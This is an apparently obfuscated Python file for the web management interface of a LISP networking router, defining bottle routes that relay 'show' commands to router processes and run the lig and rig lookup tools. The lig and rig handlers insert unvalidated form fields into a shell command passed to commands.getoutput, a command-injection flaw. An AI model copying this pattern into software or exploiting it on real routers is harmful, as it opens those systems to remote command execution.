Oo0O00Oo0o0 = "clear"
if ( name == "referral" ) :
OOoO00ooO = "lisp-mr"
I1IIIIiii1i = "Referral"
elif ( itr_name == "map-cache" ) :
OOoO00ooO = "lisp-itr"
I1IIIIiii1i = "ITR <a href='/lisp/show/itr/map-cache'>map-cache</a>"
elif ( rtr_name == "map-cache" ) :
OOoO00ooO = "lisp-rtr"
I1IIIIiii1i = "RTR <a href='/lisp/show/rtr/map-cache'>map-cache</a>"
elif ( etr_name == "stats" ) :
OOoO00ooO = "lisp-etr"
I1IIIIiii1i = ( "ETR '{}' decapsulation <a href='/lisp/show/" + "database'>stats</a>" ) . format ( stats_name )
if 51 - 51: OOooOOo . I1IiiI
Oo0O00Oo0o0 += "%" + stats_name
elif ( rtr_name == "stats" ) :
OOoO00ooO = "lisp-rtr"
I1IIIIiii1i = ( "RTR '{}' decapsulation <a href='/lisp/show/" + "rtr/map-cache'>stats</a>" ) . format ( stats_name )
if 73 - 73: OoooooooOO . I1IiiI / I1Ii111 % Ii1I
Oo0O00Oo0o0 += "%" + stats_name
else :
i1I1ii = lisp . lisp_print_sans ( "Invalid command" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 65 - 65: IiII - I1IiiI - Ii1I
if 42 - 42: II111iiii * I1IiiI % i1IIi - Ii1I % IiII
if 36 - 36: i11iIiiIii / oO0o * I1ii11iIi11i * I1ii11iIi11i + Ii1I * I11i
if 32 - 32: OoO0O00
if 50 - 50: ooOoO0o + i1IIi
Oo0O00Oo0o0 = lisp . lisp_command_ipc ( Oo0O00Oo0o0 , "lisp-core" )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , OOoO00ooO )
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
oo0ooooO = commands . getoutput ( "egrep 'lisp map-cache' ./lisp.config" )
if ( oo0ooooO != "" ) :
os . system ( "touch ./lisp.config" )
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
i1I1ii = lisp . lisp_print_sans ( "{} cleared" . format ( I1IIIIiii1i ) )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
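# The /lisp/show/... routes below forward the corresponding "show" command
# to the appropriate LISP component process (map-server, ETR, ITR, RTR, MR)
# over IPC and render the returned output.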
@ bottle . route ( '/lisp/show/map-server' )
def iIii11iI1II ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 42 - 42: ooOoO0o - I1IiiI + I1ii11iIi11i % Ii1I
if 44 - 44: i1IIi - O0 - I1ii11iIi11i * I1ii11iIi11i + OoOoOO00
return ( lispconfig . lisp_process_show_command ( Oo ,
"show map-server" ) )
if 56 - 56: ooOoO0o / iIii1I11I1II1 . Ii1I % OoOoOO00 + OOooOOo
if 10 - 10: I1Ii111 * i11iIiiIii - iIii1I11I1II1 . Oo0Ooo - I1ii11iIi11i
if 20 - 20: I1ii11iIi11i / I1IiiI * OoO0O00 * I1IiiI * O0
if 1 - 1: iIii1I11I1II1 + Oo0Ooo / O0 - iII111i % IiII + IiII
if 24 - 24: I1IiiI + Oo0Ooo + OOooOOo - OoooooooOO + Oo0Ooo
if 93 - 93: ooOoO0o . iIii1I11I1II1 % i11iIiiIii . OoOoOO00 % ooOoO0o + O0
if 65 - 65: Ii1I + OoO0O00 - OoooooooOO
@ bottle . route ( '/lisp/show/database' )
def OOoOO0o ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 51 - 51: Oo0Ooo - I1ii11iIi11i * I11i
return ( lispconfig . lisp_process_show_command ( Oo ,
"show database-mapping" ) )
if 12 - 12: iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 78 - 78: IiII . OoOoOO00 . I11i
if 97 - 97: oO0o
if 80 - 80: I1IiiI . Ii1I
if 47 - 47: I11i + ooOoO0o + II111iiii % i11iIiiIii
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
if 29 - 29: o0oOOo0O0Ooo
@ bottle . route ( '/lisp/show/itr/map-cache' )
def oo0iIiI ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 81 - 81: OoOoOO00 % Ii1I
return ( lispconfig . lisp_process_show_command ( Oo ,
"show itr-map-cache" ) )
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
@ bottle . route ( '/lisp/show/itr/rloc-probing' )
def ii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 94 - 94: ooOoO0o * I11i - IiII . iIii1I11I1II1
return ( lispconfig . lisp_process_show_command ( Oo ,
"show itr-rloc-probing" ) )
if 66 - 66: ooOoO0o - OOooOOo * OoOoOO00 / oO0o * II111iiii * OoO0O00
if 91 - 91: OoooooooOO / Ii1I . I1IiiI + ooOoO0o . II111iiii
if 45 - 45: oO0o * OoOoOO00 / iIii1I11I1II1
if 77 - 77: I1Ii111 - I11i
if 11 - 11: I1ii11iIi11i
if 26 - 26: iIii1I11I1II1 * I1Ii111 - OOooOOo
if 27 - 27: I1ii11iIi11i * I1Ii111 - OoO0O00 + Ii1I * Ii1I
@ bottle . post ( '/lisp/show/itr/map-cache/lookup' )
def o0OO0O0OO0oO0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 9 - 9: oO0o % i11iIiiIii / Oo0Ooo
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 31 - 31: OoO0O00 * i11iIiiIii * Ii1I . i11iIiiIii
if 12 - 12: OoOoOO00 % IiII % I1ii11iIi11i . i11iIiiIii * iIii1I11I1II1
OOoOO0o0o0 = "show itr-map-cache" + "%" + oO
return ( lispconfig . lisp_process_show_command ( Oo ,
OOoOO0o0o0 ) )
if 66 - 66: i11iIiiIii * iIii1I11I1II1 % OoooooooOO
if 5 - 5: OoOoOO00 % OoooooooOO
if 60 - 60: OoOoOO00 . i1IIi % OoO0O00 % ooOoO0o % OOooOOo
if 33 - 33: iIii1I11I1II1 - Ii1I * I1ii11iIi11i % iIii1I11I1II1 + OoO0O00 . OOooOOo
if 56 - 56: i11iIiiIii * iII111i . oO0o
if 78 - 78: OoOoOO00
if 1 - 1: OOooOOo . IiII
@ bottle . route ( '/lisp/show/rtr/map-cache' )
@ bottle . route ( '/lisp/show/rtr/map-cache/<dns>' )
def I1iIII1IiiI ( dns = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 96 - 96: I1IiiI % i1IIi . o0oOOo0O0Ooo . O0
if 37 - 37: i1IIi - OOooOOo % OoooooooOO / OOooOOo % ooOoO0o
if ( dns == "dns" ) :
return ( lispconfig . lisp_process_show_command ( Oo ,
"show rtr-map-cache-dns" ) )
else :
return ( lispconfig . lisp_process_show_command ( Oo ,
"show rtr-map-cache" ) )
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
@ bottle . route ( '/lisp/show/rtr/rloc-probing' )
def i1I1II ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 17 - 17: O0 * OoOoOO00 * I1ii11iIi11i * II111iiii * I11i % i1IIi
return ( lispconfig . lisp_process_show_command ( Oo ,
"show rtr-rloc-probing" ) )
if 33 - 33: I1ii11iIi11i * I1ii11iIi11i . ooOoO0o . i11iIiiIii
if 48 - 48: o0oOOo0O0Ooo . Ii1I + OoOoOO00 % I1ii11iIi11i / i11iIiiIii
if 74 - 74: II111iiii . O0 - I1IiiI + IiII % i11iIiiIii % OoOoOO00
if 78 - 78: Ii1I + OoOoOO00 + IiII - IiII . i11iIiiIii / OoO0O00
if 27 - 27: Ii1I - O0 % I11i * I1Ii111 . IiII % iIii1I11I1II1
if 37 - 37: OoooooooOO + O0 - i1IIi % ooOoO0o
if 24 - 24: OoOoOO00
@ bottle . post ( '/lisp/show/rtr/map-cache/lookup' )
def Oo0oOo0ooOOOo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 71 - 71: II111iiii - Ii1I - iII111i * O0 * IiII
if 46 - 46: IiII
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 29 - 29: II111iiii . OoOoOO00 % o0oOOo0O0Ooo * II111iiii - o0oOOo0O0Ooo * iIii1I11I1II1
if 35 - 35: II111iiii - IiII . i1IIi
OOoOO0o0o0 = "show rtr-map-cache" + "%" + oO
return ( lispconfig . lisp_process_show_command ( Oo ,
OOoOO0o0o0 ) )
if 95 - 95: I1IiiI + I1IiiI - OOooOOo - iII111i
if 45 - 45: Ii1I . OoooooooOO
if 27 - 27: Ii1I * Oo0Ooo . OoOoOO00
if 17 - 17: II111iiii % iII111i * OOooOOo % i1IIi . I1IiiI . iIii1I11I1II1
if 27 - 27: i11iIiiIii - I1IiiI
if 35 - 35: OoooooooOO - I1Ii111 / OoO0O00
if 50 - 50: OoOoOO00
@ bottle . route ( '/lisp/show/referral' )
def i1i1Ii11Ii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 57 - 57: OOooOOo + I1Ii111 % I1ii11iIi11i . OoO0O00 / OoO0O00 * O0
return ( lispconfig . lisp_process_show_command ( Oo ,
"show referral-cache" ) )
if 6 - 6: i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
if 37 - 37: IiII
if 37 - 37: Oo0Ooo / IiII * O0
if 73 - 73: iII111i * iII111i / ooOoO0o
if 43 - 43: I1ii11iIi11i . i1IIi . IiII + O0 * Ii1I * O0
@ bottle . post ( '/lisp/show/referral/lookup' )
def II11ii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 39 - 39: iII111i . I1IiiI * OoOoOO00 - i11iIiiIii
if 1 - 1: iII111i * OoOoOO00
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
OOoOO0o0o0 = "show referral-cache" + "%" + oO
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
@ bottle . route ( '/lisp/show/delegations' )
def i11I1I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 71 - 71: iII111i
return ( lispconfig . lisp_process_show_command ( Oo ,
"show delegations" ) )
if 23 - 23: i1IIi . iIii1I11I1II1 . OOooOOo . O0 % Ii1I % i11iIiiIii
if 11 - 11: O0 - II111iiii . OOooOOo . Ii1I % I1Ii111
if 21 - 21: Oo0Ooo / iII111i . I1Ii111 * OoooooooOO + I11i - i1IIi
if 58 - 58: I1ii11iIi11i
if 2 - 2: II111iiii / I1Ii111
if 54 - 54: i1IIi . I11i - I1ii11iIi11i + ooOoO0o + Oo0Ooo / Oo0Ooo
if 22 - 22: ooOoO0o . iIii1I11I1II1
@ bottle . post ( '/lisp/show/delegations/lookup' )
def i1IiiiiIi1I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 56 - 56: OoooooooOO * O0
if 85 - 85: OoooooooOO % OoOoOO00 * iIii1I11I1II1
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 44 - 44: iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
OOoOO0o0o0 = "show delegations" + "%" + oO
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
if 68 - 68: oO0o
if 10 - 10: Ii1I
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
@ bottle . route ( '/lisp/show/site' )
@ bottle . route ( '/lisp/show/site/<eid_prefix>' )
def I1 ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 35 - 35: I1IiiI
if 36 - 36: i1IIi - I1ii11iIi11i - I1Ii111
OOoOO0o0o0 = "show site"
if 7 - 7: i11iIiiIii + I1IiiI
if ( eid_prefix != "" ) :
OOoOO0o0o0 = lispconfig . lisp_parse_eid_in_url ( OOoOO0o0o0 , eid_prefix )
if 47 - 47: I1Ii111 - OOooOOo / ooOoO0o - Oo0Ooo + iII111i - iIii1I11I1II1
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 68 - 68: Ii1I - oO0o + Oo0Ooo
if 44 - 44: Ii1I * o0oOOo0O0Ooo * II111iiii
if 5 - 5: i1IIi + O0 % O0 * O0 + OoOoOO00 % i1IIi
if 80 - 80: iII111i / o0oOOo0O0Ooo + OoO0O00 / oO0o
if 46 - 46: i11iIiiIii / IiII % i1IIi - I11i * OoOoOO00
if 94 - 94: Ii1I - I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo
if 15 - 15: OOooOOo
@ bottle . route ( '/lisp/show/itr/dynamic-eid/<eid_prefix>' )
def i1iiI ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 83 - 83: oO0o / iIii1I11I1II1 + i1IIi / iII111i
if 47 - 47: oO0o + OoooooooOO . II111iiii . iII111i
OOoOO0o0o0 = "show itr-dynamic-eid"
if 66 - 66: ooOoO0o * OoOoOO00
if ( eid_prefix != "" ) :
OOoOO0o0o0 = lispconfig . lisp_parse_eid_in_url ( OOoOO0o0o0 , eid_prefix )
if 2 - 2: oO0o . I1Ii111 * Oo0Ooo + O0 - I11i * iIii1I11I1II1
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 12 - 12: o0oOOo0O0Ooo * I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: Oo0Ooo - I11i
if 24 - 24: OoooooooOO . OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
if 79 - 79: I1IiiI - ooOoO0o
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
@ bottle . route ( '/lisp/show/etr/dynamic-eid/<eid_prefix>' )
def o00OOo000O ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 42 - 42: IiII % iII111i % o0oOOo0O0Ooo % oO0o + I11i % OoOoOO00
if 3 - 3: oO0o
OOoOO0o0o0 = "show etr-dynamic-eid"
if 64 - 64: OoO0O00 . I1IiiI - OoooooooOO . ooOoO0o - iII111i
if ( eid_prefix != "" ) :
OOoOO0o0o0 = lispconfig . lisp_parse_eid_in_url ( OOoOO0o0o0 , eid_prefix )
if 77 - 77: Ii1I % OoOoOO00 / II111iiii % iII111i % OoooooooOO % OoO0O00
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 19 - 19: IiII * I1Ii111 / oO0o * I1Ii111 - OoooooooOO * I11i
if 17 - 17: II111iiii + Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
@ bottle . post ( '/lisp/show/site/lookup' )
def OO0ooOoOO0OOo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 51 - 51: iIii1I11I1II1 * o0oOOo0O0Ooo / iIii1I11I1II1 . iIii1I11I1II1 . iII111i * I11i
if 93 - 93: oO0o * Ii1I
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 27 - 27: I1IiiI * ooOoO0o
if 77 - 77: IiII
OOoOO0o0o0 = "show site" + "%" + oO + "@lookup"
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 66 - 66: iIii1I11I1II1 . i11iIiiIii / I11i / ooOoO0o + I1Ii111
if 5 - 5: OoOoOO00 % iII111i + IiII
if 13 - 13: IiII
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
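# URL /lisp/lig (POST): run the lisp-lig tool against the supplied EID and
# map-resolver (default "localhost"), optionally with a count and "no-info",
# and render its output with the RLOC/geo/elp/rle lines indented.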
@ bottle . post ( '/lisp/lig' )
def O0Oo0O0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 33 - 33: ooOoO0o % i1IIi - oO0o . O0 / O0
if 96 - 96: OoooooooOO + IiII * O0
oo0OoOO0o0o = bottle . request . forms . get ( "eid" )
OO0OOO00 = bottle . request . forms . get ( "mr" )
ooOOo0o = bottle . request . forms . get ( "count" )
IiI1Iii1 = "no-info" if bottle . request . forms . get ( "no-nat" ) == "yes" else ""
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if ( OO0OOO00 == "" ) : OO0OOO00 = "localhost"
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if ( oo0OoOO0o0o == "" ) :
i1I1ii = "Need to supply EID address"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
O0OoO0o = ""
if os . path . exists ( "lisp-lig.pyo" ) : O0OoO0o = "-O lisp-lig.pyo"
if os . path . exists ( "lisp-lig.py" ) : O0OoO0o = "lisp-lig.py"
if 1 - 1: ooOoO0o % I11i * I1ii11iIi11i - II111iiii
if 49 - 49: oO0o - iII111i % OoOoOO00
if 72 - 72: I1IiiI + IiII . OoOoOO00 + OoOoOO00
if 94 - 94: i11iIiiIii % OoooooooOO / I1IiiI
if ( O0OoO0o == "" ) :
i1I1ii = "Cannot find lisp-lig.py or lisp-lig.pyo"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 24 - 24: I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if ( ooOOo0o != "" ) : ooOOo0o = "count {}" . format ( ooOOo0o )
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
OOoOO0o0o0 = 'python {} "{}" to {} {} {}' . format ( O0OoO0o , oo0OoOO0o0o , OO0OOO00 , ooOOo0o , IiI1Iii1 )
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
i1I1ii = commands . getoutput ( OOoOO0o0o0 )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
i1I1ii = lisp . convert_font ( i1I1ii )
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
iI111II1ii = lisp . space ( 2 ) + "RLOC:"
i1I1ii = i1I1ii . replace ( "RLOC:" , iI111II1ii )
O0ooO00ooOO0o = lisp . space ( 2 ) + "Empty,"
i1I1ii = i1I1ii . replace ( "Empty," , O0ooO00ooOO0o )
I1i = lisp . space ( 4 ) + "geo:"
i1I1ii = i1I1ii . replace ( "geo:" , I1i )
o0O = lisp . space ( 4 ) + "elp:"
i1I1ii = i1I1ii . replace ( "elp:" , o0O )
I1II = lisp . space ( 4 ) + "rle:"
i1I1ii = i1I1ii . replace ( "rle:" , I1II )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
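# URL /lisp/rig (POST): run the lisp-rig tool against the supplied EID and
# DDT node (default "localhost"), optionally following all referrals, and
# render its output.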
@ bottle . post ( '/lisp/rig' )
def I1ii1Ii1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 73 - 73: O0 . oO0o + i11iIiiIii + iIii1I11I1II1 - I11i / OoOoOO00
if 99 - 99: I1ii11iIi11i * oO0o * I1ii11iIi11i - II111iiii + Ii1I
oo0OoOO0o0o = bottle . request . forms . get ( "eid" )
OOooO0Oo00 = bottle . request . forms . get ( "ddt" )
iIIIIIIIiIII = "follow-all-referrals" if bottle . request . forms . get ( "follow" ) == "yes" else ""
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 100 - 100: Ii1I + iIii1I11I1II1
if ( OOooO0Oo00 == "" ) : OOooO0Oo00 = "localhost"
if 59 - 59: IiII
if 89 - 89: OoOoOO00 % iIii1I11I1II1
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
if ( oo0OoOO0o0o == "" ) :
i1I1ii = "Need to supply EID address"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
II1io0 = ""
if os . path . exists ( "lisp-rig.pyo" ) : II1io0 = "-O lisp-rig.pyo"
if os . path . exists ( "lisp-rig.py" ) : II1io0 = "lisp-rig.py"
if 25 - 25: OoO0O00 * oO0o % i11iIiiIii + i11iIiiIii * OoO0O00
if 42 - 42: II111iiii / O0 . iIii1I11I1II1 / O0 / OoO0O00 / OoooooooOO
if 62 - 62: O0 . Oo0Ooo
if 33 - 33: Oo0Ooo / iIii1I11I1II1 % i1IIi
if ( II1io0 == "" ) :
i1I1ii = "Cannot find lisp-rig.py or lisp-rig.pyo"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
OOoOO0o0o0 = 'python {} "{}" to {} {}' . format ( II1io0 , oo0OoOO0o0o , OOooO0Oo00 , iIIIIIIIiIII )
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
i1I1ii = commands . getoutput ( OOoOO0o0o0 )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
i1I1ii = lisp . convert_font ( i1I1ii )
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
o0OOOOOo0 = lisp . space ( 2 ) + "Referrals:"
i1I1ii = i1I1ii . replace ( "Referrals:" , o0OOOOOo0 )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 57 - 57: iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
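# For the /lisp/geo page: return a two-element list with the geo-coordinate
# strings for eid1 and eid2. Arguments that are already geo-strings are
# returned as-is; otherwise lisp-lig is run against the first map-resolver
# found in lisp.config and the "geo:" line of the reply is extracted.
# None is returned for a value that cannot be resolved.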
def oOOOOO0Ooooo ( eid1 , eid2 ) :
O0OoO0o = None
if os . path . exists ( "lisp-lig.pyo" ) : O0OoO0o = "-O lisp-lig.pyo"
if os . path . exists ( "lisp-lig.py" ) : O0OoO0o = "lisp-lig.py"
if ( O0OoO0o == None ) : return ( [ None , None ] )
if 57 - 57: Ii1I - OoooooooOO
if 68 - 68: o0oOOo0O0Ooo % I1ii11iIi11i / I1Ii111 + I1Ii111 - I1Ii111 . OoO0O00
if 100 - 100: OoOoOO00 % Oo0Ooo
if 76 - 76: II111iiii / OoO0O00 + OoooooooOO . I1ii11iIi11i . I11i . ooOoO0o
iiiI = commands . getoutput ( "egrep -A 2 'lisp map-resolver {' ./lisp.config" )
OO0OOO00 = None
for I1I1 in [ "address = " , "dns-name = " ] :
OO0OOO00 = None
iIIIiiiIiI1 = iiiI . find ( I1I1 )
if ( iIIIiiiIiI1 == - 1 ) : continue
OO0OOO00 = iiiI [ iIIIiiiIiI1 + len ( I1I1 ) : : ]
iIIIiiiIiI1 = OO0OOO00 . find ( "\n" )
if ( iIIIiiiIiI1 == - 1 ) : continue
OO0OOO00 = OO0OOO00 [ 0 : iIIIiiiIiI1 ]
break
if 95 - 95: Ii1I - I1ii11iIi11i - O0 . I1IiiI . iII111i
if ( OO0OOO00 == None ) : return ( [ None , None ] )
if 7 - 7: I1Ii111
if 45 - 45: O0 - OOooOOo
if 56 - 56: O0 + Ii1I
if 24 - 24: i11iIiiIii - Ii1I + oO0o * I1IiiI
